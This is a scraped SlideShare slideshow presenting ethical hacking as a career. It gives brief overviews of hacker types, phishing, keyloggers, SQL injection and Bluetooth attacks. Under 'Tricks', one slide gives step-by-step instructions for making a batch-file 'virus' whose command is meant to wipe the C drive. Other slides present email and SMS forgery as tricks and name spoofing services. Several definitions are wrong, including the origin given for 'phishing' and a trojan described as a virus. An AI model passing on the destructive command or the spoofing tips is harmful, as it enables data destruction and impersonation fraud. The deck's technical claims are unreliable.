SlideShare a Scribd company logo
ETHICAL HACKING
....AS A CAREER OBJECTIVE
j
DIFFERENCE BETWEEN SECURITY
AND PROTECTION
Security and protection are extremely close
concepts though not same.
 Security measures are adopted to increase
the level of protection
The feeling of protection arises when one
has enough security measures
Security is a type of protection against
external threats.
HACKER AND ETHICAL HACKER
 Hacker
• Access computer system or network without
authorization
• Breaks the law
 Ethical Hacker
• Performs most of the same activities but with owner’s
permission
• Employed by companies to perform Penetration Tests
TYPES OF HACKER
 White Hat Hacker
• Good guys
• Don’t use their skill for illegal purpose
• Computer security experts and help to protect from
Black Hats.
Black Hat Hacker
• Bad guys
• Use their skill maliciously for personal gain
• Hack banks, steal credit cards and deface websites
 Grey Hat Hacker
• It is a combination of White hat n Black Hat Hackers
• Goal of grey hat hackers is to provide national security
HACKING PROCESS
Footprinting
Scanning
Enumeration
Attack and Gaining
Access
Escalating Privilege,
Covering Tracks and
Creating Backdoors
TYPES OF HACKING
Phishing
Key loggers
Trojans
Sql injection
Kali Linux (back-track)
Bluetooth hacking
PHISHING
• Pronounced "fishing“
• The word has its Origin from two words “Password Harvesting” or fishing for Passwords
• Phishing is an online form of pretexting, a kind of deception in which an attacker
pretends to be someone else in order to obtain sensitive information from the victim
• Also known as "brand spoofing“
• Phishers are phishing artists
KEYLOGGING
A program or hardware device that captures every key depression on the computer
Key Loggers record keystrokes:
• Legitimate use: Monitor employee productivity
• Illegal uses: Steal passwords, usernames, and other personal/corporate data
There are ways to protect yourself:
• Be aware of what’s installed on your computer
• Use caution when surfing the internet
• Keep your computer’s security software
updated
TROJAN HORSE
A computer virus is a computer program that can copy itself and infect a computer without
permission or knowledge of the user.
Type Of Trojan Horse Hacking
 There are two types of Trojan Horse :
 -Time Bomb and Logic Bomb
 -Droppers
We need to be careful when download something.
We also need an anti-virus to protect our computer
from be infected by virus.
SQL INJECTION:
• SQL injection is a code injection technique that exploits a security vulnerability occurring in
the database layer of an application. The vulnerability is present when user input is either
incorrectly filtered for string literal escape characters embedded in SQL statements or user
input is not strongly typed.
• URL based injection:
• Avoid using clear text when coding in SQL.
• If your database and webpage are constructed in a way where you can view the
data, it’s open to injection.
• http://mysite.com/listauthordetails.aspx?SSN=172-32-9999
• As in prior example, you could add a drop, or other command, to alter the
database.
• Passwords, and other sensitive information need to be either encrypted or one way
hashed. There is no full proof way to defend from injection, but by limiting sensitive
information, you can insure that your information is at least somewhat protected.
Kali Linux is a Debian-derived Linux
distribution designed for digital
forensics and penetration testing. It is
maintained and funded by Offensive
Security Ltd
* It is used to hack any anti virus, website..etc
BLUETOOTH ATTACK
• Why Bluesnarfing attack happens ?
- vendors implementation of OBEX protocol
• Three profiles use the OBEX protocol:
- Synchronization Profile (secure)
- File Transfer Profile (secure)
- Object Push (insecure)
File Transfer
Profile
Aplication
Object Push
Business
Card
Synchronization
Phone Book,
Calender
OBEX
Lower Layers
Application Layer
Session Layer
TRICKS
• EMAIL FORGING
• SMS FORGING
• Virus commands
EMAIL FORGING
Definition:
Email Forging is the art of sending an email from the victim’s email account without
knowing the password.
Working:
• ATTACKER-----Sends Forged email----- FROM VICTIM
WEBSITES: https://emkei.cz, www.anonymailer.net...
SMS FORGING
• Now the concept of SMS forging lies in changing the SCCP packer which
contains
the sender information prior delivering to the SMS gateway.
• The intruder can change the SCCP packet and can send that packet to any
of the receiver as a spoofed SMS.
• Some of the Website on the net also provide this facility.
• To provide such service is not legal and the user using this may lead so
serious consequences with law.
• Website: http://www.spranked.com
Open Notepad and copy below code into
it.
@Echo off
Del C: *.* |y
2. Save this file as virus.bat (Name can
be anything but .bat is must)
3. Now, running this file will delete all
the content of C Drive.
Virus using commands on notepad
The Certified Ethical Hacker is
a professional certification, provided by
the International Council of E-Commerce
Consultants (EC-Council.)
CEH V8
hacking ,bluetooth
QUESTIONS???
hacking ,bluetooth

More Related Content

What's hot (19)

PPT
Basic of Ethical Hacking and Penetration Testing - 1st Module
ankit sarode
 
PPT
Introduction To Ethical Hacking
Akshay Kale
 
PPT
Hacking presentation
dineshgarhwal77
 
PPT
Hacking presentation BASIC
Lakkireddy Bali Reddy Collage of Engineering
 
PPTX
HACKING
Shubham Agrawal
 
KEY
Computer crime hacking
tangytangling
 
PPTX
Ethical hacking
AKSHAY KHATRI
 
PPTX
Internet and Global Connectivity – Security Concerns
Akshay Jain
 
PPTX
Cyber crime introduction awareness program at st. xavier
Mo Han
 
PPTX
Hacking
Asma Khan
 
PPTX
Hacking
Sitwat Rao
 
PPTX
Hacking,History Of Hacking,Types of Hacking,Types Of Hackers,Cyber Laws for ...
Qazi Anwar
 
PPT
What are various types of cyber attacks
kanika sharma
 
PDF
Certified Ethical Hacking - Book Summary
udemy course
 
PPTX
Hacking
Sharique Masood
 
PPT
Hackers
guesta04f59b
 
PDF
Cyber security slideshare_oct_2020
Arun Velayudhan
 
PPTX
Hacking presentation
Ajith Reddy
 
PPT
Hacking
Jay Janodia
 
Basic of Ethical Hacking and Penetration Testing - 1st Module
ankit sarode
 
Introduction To Ethical Hacking
Akshay Kale
 
Hacking presentation
dineshgarhwal77
 
Computer crime hacking
tangytangling
 
Ethical hacking
AKSHAY KHATRI
 
Internet and Global Connectivity – Security Concerns
Akshay Jain
 
Cyber crime introduction awareness program at st. xavier
Mo Han
 
Hacking
Asma Khan
 
Hacking
Sitwat Rao
 
Hacking,History Of Hacking,Types of Hacking,Types Of Hackers,Cyber Laws for ...
Qazi Anwar
 
What are various types of cyber attacks
kanika sharma
 
Certified Ethical Hacking - Book Summary
udemy course
 
Hackers
guesta04f59b
 
Cyber security slideshare_oct_2020
Arun Velayudhan
 
Hacking presentation
Ajith Reddy
 
Hacking
Jay Janodia
 

Viewers also liked (20)

PDF
Passive Income Excuses Debunked
Rob Cubbon
 
PPT
Astaro Customer Presentation
techworldvn
 
PDF
amrapali builders@@@bluetooth hacking.pdf
amrapalibuildersreviews
 
PDF
OSINT RF Reverse Engineering by Marc Newlin
EC-Council
 
PDF
Resume Ramdas P
Ramdas Lingannan
 
PDF
Extracting the Painful (Blue)Tooth - Presentation
Opposing Force S.r.l.
 
PPTX
Bluejacking sadhana
Sadhana28
 
PDF
Open source intelligence information gathering (OSINT)
phexcom1
 
PDF
OSINT tools for security auditing with python
Jose Manuel Ortega Candel
 
PPTX
Blackmagic Open Source Intelligence OSINT
Sudhanshu Chauhan
 
PDF
OSINT- Leveraging data into intelligence
Deep Shankar Yadav
 
PPT
Bluetooth Hacking
Binghamton University
 
PPTX
How to Use Open Source Intelligence (OSINT) in Investigations
Case IQ
 
PDF
OSINT - Open Source Intelligence "Leading Intelligence and Investigation Tech...
Falgun Rathod
 
PPT
Bluetooth security
Ramasubbu .P
 
PPTX
Tools for Open Source Intelligence (OSINT)
Sudhanshu Chauhan
 
PDF
What you need to know about OSINT
Jerod Brennen
 
PPT
Tutorial 7 - Wireless Networking and Security
dpd
 
PDF
Open Source Intelligence (OSINT)
festival ICT 2016
 
Passive Income Excuses Debunked
Rob Cubbon
 
Astaro Customer Presentation
techworldvn
 
amrapali builders@@@bluetooth hacking.pdf
amrapalibuildersreviews
 
OSINT RF Reverse Engineering by Marc Newlin
EC-Council
 
Resume Ramdas P
Ramdas Lingannan
 
Extracting the Painful (Blue)Tooth - Presentation
Opposing Force S.r.l.
 
Bluejacking sadhana
Sadhana28
 
Open source intelligence information gathering (OSINT)
phexcom1
 
OSINT tools for security auditing with python
Jose Manuel Ortega Candel
 
Blackmagic Open Source Intelligence OSINT
Sudhanshu Chauhan
 
OSINT- Leveraging data into intelligence
Deep Shankar Yadav
 
Bluetooth Hacking
Binghamton University
 
How to Use Open Source Intelligence (OSINT) in Investigations
Case IQ
 
OSINT - Open Source Intelligence "Leading Intelligence and Investigation Tech...
Falgun Rathod
 
Bluetooth security
Ramasubbu .P
 
Tools for Open Source Intelligence (OSINT)
Sudhanshu Chauhan
 
What you need to know about OSINT
Jerod Brennen
 
Tutorial 7 - Wireless Networking and Security
dpd
 
Open Source Intelligence (OSINT)
festival ICT 2016
 

Similar to hacking ,bluetooth (20)

PPTX
Protection from hacking attacks
Sugirtha Jasmine M
 
PPTX
Hacking
VipinYadav257
 
PPTX
How to hack or what is ethical hacking
baabtra.com - No. 1 supplier of quality freshers
 
PPTX
Security Basics
Rishi Prasath
 
PPTX
Ethical Hacking justvamshi .pptx
vamshimatangi
 
PPTX
Ethical hacking : Its methodologies and tools
chrizjohn896
 
PPTX
cyber-security for companies and private
szydlowskiromulo
 
PDF
Introduction of hacking and cracking
Harshil Barot
 
PPTX
sourabh_sipPPT.pptx
SourabhRuhil4
 
PPTX
building foundation for ethical hacking.ppt
ShivaniSingha1
 
PDF
Information & cyber security, Winter training ,bsnl. online
SumanPramanik7
 
PDF
Information cyber security
SumanPramanik7
 
PPTX
Hacking intro
Milind Mishra
 
PPTX
Cysecc.pptx
jondon17
 
PPTX
cybersecurity notes important points.pptx
dhumaletiku
 
PDF
E Commerce security
Mayank Kashyap
 
PPTX
Cyber Security and Data Privacy in Information Systems.pptx
Roshni814224
 
PPTX
Cyber security
ChethanMp7
 
PPTX
Entrepreneurship & Commerce in IT - 11 - Security & Encryption
Sachintha Gunasena
 
PPTX
Cyber Security Module 3.pptx Cybersecurity is the practice of protecting syst...
GIRISHKUMARBC1
 
Protection from hacking attacks
Sugirtha Jasmine M
 
Hacking
VipinYadav257
 
How to hack or what is ethical hacking
baabtra.com - No. 1 supplier of quality freshers
 
Security Basics
Rishi Prasath
 
Ethical Hacking justvamshi .pptx
vamshimatangi
 
Ethical hacking : Its methodologies and tools
chrizjohn896
 
cyber-security for companies and private
szydlowskiromulo
 
Introduction of hacking and cracking
Harshil Barot
 
sourabh_sipPPT.pptx
SourabhRuhil4
 
building foundation for ethical hacking.ppt
ShivaniSingha1
 
Information & cyber security, Winter training ,bsnl. online
SumanPramanik7
 
Information cyber security
SumanPramanik7
 
Hacking intro
Milind Mishra
 
Cysecc.pptx
jondon17
 
cybersecurity notes important points.pptx
dhumaletiku
 
E Commerce security
Mayank Kashyap
 
Cyber Security and Data Privacy in Information Systems.pptx
Roshni814224
 
Cyber security
ChethanMp7
 
Entrepreneurship & Commerce in IT - 11 - Security & Encryption
Sachintha Gunasena
 
Cyber Security Module 3.pptx Cybersecurity is the practice of protecting syst...
GIRISHKUMARBC1
 

Recently uploaded (20)

PDF
Reconstruct, Restore, Reimagine: New Perspectives on Stoke Newington’s Histor...
History of Stoke Newington
 
PDF
CONCURSO DE POESIA “POETUFAS – PASSOS SUAVES PELO VERSO.pdf
Colégio Santa Teresinha
 
PDF
Knee Extensor Mechanism Injuries - Orthopedic Radiologic Imaging
Sean M. Fox
 
PDF
LAW OF CONTRACT ( 5 YEAR LLB & UNITARY LLB)- MODULE-3 - LEARN THROUGH PICTURE
APARNA T SHAIL KUMAR
 
PPTX
How to Convert an Opportunity into a Quotation in Odoo 18 CRM
Celine George
 
PDF
ARAL-Orientation_Morning-Session_Day-11.pdf
JoelVilloso1
 
PDF
Lesson 2 - WATER,pH, BUFFERS, AND ACID-BASE.pdf
marvinnbustamante1
 
PPTX
Soil and agriculture microbiology .pptx
Keerthana Ramesh
 
PPTX
Universal immunization Programme (UIP).pptx
Vishal Chanalia
 
PPTX
MENINGITIS: NURSING MANAGEMENT, BACTERIAL MENINGITIS, VIRAL MENINGITIS.pptx
PRADEEP ABOTHU
 
PPTX
How to Manage Large Scrollbar in Odoo 18 POS
Celine George
 
PPTX
STAFF DEVELOPMENT AND WELFARE: MANAGEMENT
PRADEEP ABOTHU
 
PDF
The-Ever-Evolving-World-of-Science (1).pdf/7TH CLASS CURIOSITY /1ST CHAPTER/B...
Sandeep Swamy
 
PPTX
How to Create a PDF Report in Odoo 18 - Odoo Slides
Celine George
 
PPTX
Stereochemistry-Optical Isomerism in organic compoundsptx
Tarannum Nadaf-Mansuri
 
PDF
CEREBRAL PALSY: NURSING MANAGEMENT .pdf
PRADEEP ABOTHU
 
PPTX
I AM MALALA The Girl Who Stood Up for Education and was Shot by the Taliban...
Beena E S
 
PPTX
Unit 2 COMMERCIAL BANKING, Corporate banking.pptx
AnubalaSuresh1
 
PDF
ARAL_Orientation_Day-2-Sessions_ARAL-Readung ARAL-Mathematics ARAL-Sciencev2.pdf
JoelVilloso1
 
PDF
The Different Types of Non-Experimental Research
Thelma Villaflores
 
Reconstruct, Restore, Reimagine: New Perspectives on Stoke Newington’s Histor...
History of Stoke Newington
 
CONCURSO DE POESIA “POETUFAS – PASSOS SUAVES PELO VERSO.pdf
Colégio Santa Teresinha
 
Knee Extensor Mechanism Injuries - Orthopedic Radiologic Imaging
Sean M. Fox
 
LAW OF CONTRACT ( 5 YEAR LLB & UNITARY LLB)- MODULE-3 - LEARN THROUGH PICTURE
APARNA T SHAIL KUMAR
 
How to Convert an Opportunity into a Quotation in Odoo 18 CRM
Celine George
 
ARAL-Orientation_Morning-Session_Day-11.pdf
JoelVilloso1
 
Lesson 2 - WATER,pH, BUFFERS, AND ACID-BASE.pdf
marvinnbustamante1
 
Soil and agriculture microbiology .pptx
Keerthana Ramesh
 
Universal immunization Programme (UIP).pptx
Vishal Chanalia
 
MENINGITIS: NURSING MANAGEMENT, BACTERIAL MENINGITIS, VIRAL MENINGITIS.pptx
PRADEEP ABOTHU
 
How to Manage Large Scrollbar in Odoo 18 POS
Celine George
 
STAFF DEVELOPMENT AND WELFARE: MANAGEMENT
PRADEEP ABOTHU
 
The-Ever-Evolving-World-of-Science (1).pdf/7TH CLASS CURIOSITY /1ST CHAPTER/B...
Sandeep Swamy
 
How to Create a PDF Report in Odoo 18 - Odoo Slides
Celine George
 
Stereochemistry-Optical Isomerism in organic compoundsptx
Tarannum Nadaf-Mansuri
 
CEREBRAL PALSY: NURSING MANAGEMENT .pdf
PRADEEP ABOTHU
 
I AM MALALA The Girl Who Stood Up for Education and was Shot by the Taliban...
Beena E S
 
Unit 2 COMMERCIAL BANKING, Corporate banking.pptx
AnubalaSuresh1
 
ARAL_Orientation_Day-2-Sessions_ARAL-Readung ARAL-Mathematics ARAL-Sciencev2.pdf
JoelVilloso1
 
The Different Types of Non-Experimental Research
Thelma Villaflores
 

hacking ,bluetooth

  • 1. ETHICAL HACKING ....AS A CAREER OBJECTIVE j
  • 2. DIFFERENCE BETWEEN SECURITY AND PROTECTION Security and protection are extremely close concepts though not same.  Security measures are adopted to increase the level of protection The feeling of protection arises when one has enough security measures Security is a type of protection against external threats.
  • 3. HACKER AND ETHICAL HACKER  Hacker • Access computer system or network without authorization • Breaks the law  Ethical Hacker • Performs most of the same activities but with owner’s permission • Employed by companies to perform Penetration Tests
  • 4. TYPES OF HACKER  White Hat Hacker • Good guys • Don’t use their skill for illegal purpose • Computer security experts and help to protect from Black Hats. Black Hat Hacker • Bad guys • Use their skill maliciously for personal gain • Hack banks, steal credit cards and deface websites  Grey Hat Hacker • It is a combination of White hat n Black Hat Hackers • Goal of grey hat hackers is to provide national security
  • 5. HACKING PROCESS Footprinting Scanning Enumeration Attack and Gaining Access Escalating Privilege, Covering Tracks and Creating Backdoors
  • 6. TYPES OF HACKING Phishing Key loggers Trojans Sql injection Kali Linux (back-track) Bluetooth hacking
  • 7. PHISHING • Pronounced "fishing“ • The word has its Origin from two words “Password Harvesting” or fishing for Passwords • Phishing is an online form of pretexting, a kind of deception in which an attacker pretends to be someone else in order to obtain sensitive information from the victim • Also known as "brand spoofing“ • Phishers are phishing artists
  • 8. KEYLOGGING A program or hardware device that captures every key depression on the computer Key Loggers record keystrokes: • Legitimate use: Monitor employee productivity • Illegal uses: Steal passwords, usernames, and other personal/corporate data There are ways to protect yourself: • Be aware of what’s installed on your computer • Use caution when surfing the internet • Keep your computer’s security software updated
  • 9. TROJAN HORSE A computer virus is a computer program that can copy itself and infect a computer without permission or knowledge of the user. Type Of Trojan Horse Hacking  There are two types of Trojan Horse :  -Time Bomb and Logic Bomb  -Droppers We need to be careful when download something. We also need an anti-virus to protect our computer from be infected by virus.
  • 10. SQL INJECTION: • SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed. • URL based injection: • Avoid using clear text when coding in SQL. • If your database and webpage are constructed in a way where you can view the data, it’s open to injection. • http://mysite.com/listauthordetails.aspx?SSN=172-32-9999 • As in prior example, you could add a drop, or other command, to alter the database. • Passwords, and other sensitive information need to be either encrypted or one way hashed. There is no full proof way to defend from injection, but by limiting sensitive information, you can insure that your information is at least somewhat protected.
  • 11. Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd * It is used to hack any anti virus, website..etc
  • 12. BLUETOOTH ATTACK • Why Bluesnarfing attack happens ? - vendors implementation of OBEX protocol • Three profiles use the OBEX protocol: - Synchronization Profile (secure) - File Transfer Profile (secure) - Object Push (insecure) File Transfer Profile Aplication Object Push Business Card Synchronization Phone Book, Calender OBEX Lower Layers Application Layer Session Layer
  • 13. TRICKS • EMAIL FORGING • SMS FORGING • Virus commands
  • 14. EMAIL FORGING Definition: Email Forging is the art of sending an email from the victim’s email account without knowing the password. Working: • ATTACKER-----Sends Forged email----- FROM VICTIM WEBSITES: https://emkei.cz, www.anonymailer.net...
  • 15. SMS FORGING • Now the concept of SMS forging lies in changing the SCCP packer which contains the sender information prior delivering to the SMS gateway. • The intruder can change the SCCP packet and can send that packet to any of the receiver as a spoofed SMS. • Some of the Website on the net also provide this facility. • To provide such service is not legal and the user using this may lead so serious consequences with law. • Website: http://www.spranked.com
  • 16. Open Notepad and copy below code into it. @Echo off Del C: *.* |y 2. Save this file as virus.bat (Name can be anything but .bat is must) 3. Now, running this file will delete all the content of C Drive. Virus using commands on notepad
  • 17. The Certified Ethical Hacker is a professional certification, provided by the International Council of E-Commerce Consultants (EC-Council.) CEH V8